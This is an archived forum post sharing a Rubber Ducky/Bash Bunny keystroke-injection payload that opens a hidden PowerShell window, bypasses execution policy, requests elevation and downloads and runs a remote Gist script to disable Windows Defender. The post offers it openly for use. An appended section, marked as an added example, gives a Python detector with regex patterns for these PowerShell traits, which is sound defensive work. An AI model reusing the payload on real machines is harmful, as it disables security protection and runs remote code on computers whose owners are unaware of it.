[PAYLOAD] DisableD3f3nd3r


InfoSecREDD

DisableD3f3nd3r

This payload was created out of frustration with people asking how to disable Windows Defender via Bash Bunny or Rubber Ducky. I have released payloads for both devices. This is just a basic PowerShell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender".

Source Code of the PowerShell Script:
https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc

The Payload:
 

#!/bin/bash
#
# Title:         Disable D3f3nd3r (Rubber Ducky)
# Description:   This Payload disables Windows Defender using Powershell, Works also for the Hak5
#                Rubber Ducky or any HID device that supports Quacking.
# Author:        REDD of Private-Locker
# Version:       1.0
# Category:      Disable Security
# Target:        Windows
#
# Source:        https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1
#

Q WIN R
Q STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\""
Q LEFTARROW;
Q ENTER;
Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\""
Q ENTER;
sleep 1;
Q STRING "exit";
Q ENTER;

 

(Developer's Note - I personally do NOT own a Rubber Ducky. This script has just been adapted to Rubber Ducky format. If there are any issues, please comment or contact me.)


Archived

This topic is now archived and is closed to further replies.
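
Added example, not part of the original post or the author's code: a defender-side triage of process-creation command lines (for instance Security event 4688 with command-line auditing, or Sysmon event 1) for the traits visible in the two commands the payload types. The indicator names, severity tiers and sample events are assumptions constructed for illustration, and the URL is a placeholder.

```python
import re

# Traits taken from the two commands the payload types (names are this example's own).
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-(?:ex[a-z]*|ep)\s+bypass\b", re.I),
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),
    "elevation_request": re.compile(r"start-process\b.*-verb\s+runas\b", re.I),
    "download_string": re.compile(r"net\.webclient\b.*\.downloadstring\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}

def classify(cmdline):
    """Return (severity, sorted indicator names) for one process command line."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))
    if {"download_string", "invoke_expression"} <= set(hits):
        severity = "high"    # remote script fetched and run in memory
    elif len(hits) >= 2:
        severity = "medium"  # e.g. hidden window plus a UAC elevation request
    elif hits:
        severity = "low"     # single trait, also seen in legitimate admin tooling
    else:
        severity = "none"
    return severity, hits

# Constructed sample command lines; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    'powershell -NoP -NonI -W Hidden -Exec Bypass -c '
    '"Start-Process cmd -A \'/t:4f\'-Verb runAs"',
    'powershell -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient)'
    '.DownloadString(\'https://example.invalid/script.ps1\');"',
    r'powershell -NoProfile -File C:\Scripts\backup.ps1',
    r'powershell -ExecutionPolicy Bypass -File C:\Scripts\deploy.ps1',
]

def triage(events):
    """Return only the events that matched, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    scored = [(classify(e), e) for e in events]
    flagged = [(sev, hits, e) for (sev, hits), e in scored if sev != "none"]
    return sorted(flagged, key=lambda row: order[row[0]])

if __name__ == "__main__":
    for sev, hits, cmd in triage(SAMPLE_EVENTS):
        print(sev, ",".join(hits), "|", cmd[:70])
```

A lone `-ExecutionPolicy Bypass` stays at low severity because deployment tooling uses it routinely; it is the combination with an in-memory download or a hidden elevated shell that deserves an analyst's attention.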
